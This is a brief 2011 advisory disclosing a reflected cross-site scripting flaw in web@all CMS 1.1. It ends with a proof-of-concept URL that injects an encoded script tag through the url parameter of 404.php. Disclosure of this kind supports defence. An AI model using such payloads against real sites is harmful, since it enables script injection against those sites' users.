------------------------------------------------------------------------ Software................web@all CMS 1.1 Vulnerability...........Reflected Cross-site Scripting Download................http://webatall.com/ Release Date............1/24/2011 Tested On...............Windows 7 + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in web@all CMS 1.1 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E